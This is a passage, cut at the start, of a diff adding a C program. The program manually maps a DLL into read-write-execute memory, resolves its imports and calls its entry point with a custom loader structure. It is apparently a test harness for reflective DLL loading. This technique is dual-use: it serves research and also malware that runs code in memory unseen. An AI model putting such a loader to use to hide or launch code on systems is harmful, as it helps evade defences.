argv[0]); + return -1; + } + + DWORD dwWait = 2; + + if (argc == 4) { + errno = 0; + dwWait = strtoul(argv[3], NULL, 10); + if (errno != 0) + dwWait = 2; + } + + BOOL doAllocAt = FALSE; + PVOID allocPtr = NULL; + if (argc >= 3) { + doAllocAt = TRUE; + char* errch = NULL; + allocPtr = (PVOID)strtoul(argv[2], &errch, 16); + } + + HANDLE handle; + HINSTANCE laddress; + LPSTR libname; + DWORD byteread; + PIMAGE_NT_HEADERS nt; + PIMAGE_SECTION_HEADER section; + DWORD dwValueA; + DWORD dwValueB; + DWORD dwValueC; + DWORD dwValueD; + + // read the file + printf("Reading file..\n"); + handle = CreateFile(argv[1],GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); + if (handle == INVALID_HANDLE_VALUE) { + fprintf(stderr, "%s: file(%s) does not exist or is not readable\n", argv[0], argv[1]); + return -1; + } + + // get the file size + size = GetFileSize(handle,NULL); + if (size <= 0) { + fprintf(stderr, "%s: invalid file(%s) size\n", argv[0], argv[1]); + return -1; + } + + // Allocate the space + vpointer = VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_READWRITE); + + // read file on the allocated space + ReadFile(handle,vpointer,size,&byteread,NULL); + CloseHandle(handle); + printf("File loaded into memory ..\n"); + printf("address............: 0x%X (%lu)\n", (unsigned int)vpointer, (long unsigned int)vpointer); + printf("size...............: 0x%X (%lu)\n", (unsigned int)size, size); + printf("Parse PE-Header ..\n"); + + // read NT header of the file + nt = (PIMAGE_NT_HEADERS)((PCHAR)vpointer + ((PIMAGE_DOS_HEADER)vpointer)->e_lfanew); + printf("e_lfanew...........: 0x%X (%ld)\n", (unsigned int)((PIMAGE_DOS_HEADER)vpointer)->e_lfanew, ((PIMAGE_DOS_HEADER)vpointer)->e_lfanew); + handle = GetCurrentProcess(); + + // get VA of entry point + printf("AddressOfEntryPoint: 0x%X (%ld)\n", (unsigned int)nt->OptionalHeader.AddressOfEntryPoint, nt->OptionalHeader.AddressOfEntryPoint); + printf("ImageBase..........: 0x%X (%ld)\n", (unsigned int)nt->OptionalHeader.ImageBase, nt->OptionalHeader.ImageBase); + printf("SizeOfImage........: 0x%X (%ld)\n", (unsigned int)nt->OptionalHeader.SizeOfImage, nt->OptionalHeader.SizeOfImage); + printf("SizeOfHeaders......: 0x%X (%ld)\n", (unsigned int)nt->OptionalHeader.SizeOfHeaders, nt->OptionalHeader.SizeOfHeaders); + printf("SizeOptionalHeader.: 0x%X (%d)\n", (unsigned int)nt->FileHeader.SizeOfOptionalHeader, nt->FileHeader.SizeOfOptionalHeader); + + // Allocate the space with Imagebase as a desired address allocation request + memalloc = VirtualAllocEx( + handle, + (doAllocAt == FALSE ? (LPVOID)nt->OptionalHeader.ImageBase : allocPtr), + nt->OptionalHeader.SizeOfImage, + MEM_RESERVE | MEM_COMMIT, + PAGE_EXECUTE_READWRITE + ); + + // Check for NULL (esp. if the user wants to chooose a specific VA) + if (!memalloc) { + printf("FATAL: VirtualAllocEx failed with %d\n", (int)GetLastError()); + exit(1); + } + EntryAddr = (DWORD)memalloc + nt->OptionalHeader.AddressOfEntryPoint; + + // Write headers on the allocated space + WriteProcessMemory(handle, + memalloc, + vpointer, + nt->OptionalHeader.SizeOfHeaders, + 0 + ); + + + // write sections on the allocated space + section = IMAGE_FIRST_SECTION(nt); + printf("sizeof(section)....: 0x%X (%u)\n", sizeof(IMAGE_SECTION_HEADER), sizeof(IMAGE_SECTION_HEADER)); + printf("FirstSectionRVA....: 0x%X (%ld)\n", (unsigned int)section[0].VirtualAddress, section[0].VirtualAddress); + printf("FirstSectionPTR....: 0x%X (%ld)\n", (unsigned int)section[0].PointerToRawData, section[0].PointerToRawData); + if ((unsigned int)memalloc != (unsigned int)nt->OptionalHeader.ImageBase) { + printf("Allocated memory block does not start at DLL image base!\n" + " -> 0x%X != 0x%X\n", (unsigned int)memalloc, (unsigned int)nt->OptionalHeader.ImageBase); + } + + for (ULONG i = 0; i < nt->FileHeader.NumberOfSections; i++) + { + WriteProcessMemory( + handle, + (PCHAR)memalloc + section[i].VirtualAddress, + (PCHAR)vpointer + section[i].PointerToRawData, + section[i].SizeOfRawData, + 0 + ); + } + + if (*(DWORD*)&(nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]) != 0x00000000) + { + // read import dirctory, if exists + dwValueB = (DWORD) &(nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]); + + // get the VA + dwValueC = (DWORD)(memalloc) + + ((PIMAGE_DATA_DIRECTORY)dwValueB)->VirtualAddress; + + while(((PIMAGE_IMPORT_DESCRIPTOR)dwValueC)->Name) + { + // get DLL name + libname = (LPSTR)((DWORD)(memalloc) + + ((PIMAGE_IMPORT_DESCRIPTOR)dwValueC)->Name); + + // Load dll + laddress = LoadLibrary(libname); + + // get first thunk, it will become our IAT + dwValueA = (DWORD)(memalloc) + + ((PIMAGE_IMPORT_DESCRIPTOR)dwValueC)->FirstThunk; + + // resolve function addresses + while(DEREF_32(dwValueA)) + { + dwValueD = (DWORD)(memalloc) + DEREF_32(dwValueA); + // get function name + LPSTR Fname = (LPSTR)((PIMAGE_IMPORT_BY_NAME)dwValueD)->Name; + // get function addresses + DEREF_32(dwValueA) = (DWORD)GetProcAddress(laddress,Fname); + dwValueA += 4; + } + + dwValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR ); + } + } else printf("No Import Table found, nothing to import ..\n"); + + memset((void*)&ldr, '\0', sizeof(ldr)); + ldr.ptrToDLL = (uint32_t)vpointer; + ldr.sizOfDLL = size; + unsigned char marker[] = { _LOADER_ENDMARKER }; + memcpy((void*)&ldr.endMarker, &marker[0], sizeof(ldr.endMarker)); + + ldr_ptr = (volatile PVOID) &ldr; + kernel32 = LoadLibraryA("KERNEL32.dll"); + getproc = GetProcAddress((void*)kernel32, "GetProcAddress"); + + printf("Calling DLL AdrOfEntry ..\n"); + // call the entry point :: here we assume that everything is ok. + asm volatile( + ".intel_syntax noprefix\n" + "pushad\n\t" + "pushfd\n\t" + "mov ebx,0xdeadbeef\n\t" + "mov ecx,[__getproc]\n\t" + "mov edx,[__kernel32]\n\t" + "mov edi,__memalloc\n\t" + "mov esi,__ldr\n\t" + "push 0x00000000\n\t" + "call [__EntryAddr]\n\t" + "pop esi\n\t" + "mov [__retval],eax\n\t" + "popfd\n\t" + "popad\n\t" + ".att_syntax\n" + ); + + sleep(dwWait); + printf("DLL returned: %X (%d)\n", (unsigned int)retval, (int)retval); + printf("GetLastError: 0x%X (%ld)\n", (unsigned int)GetLastError(), GetLastError()); + + return retval; +} |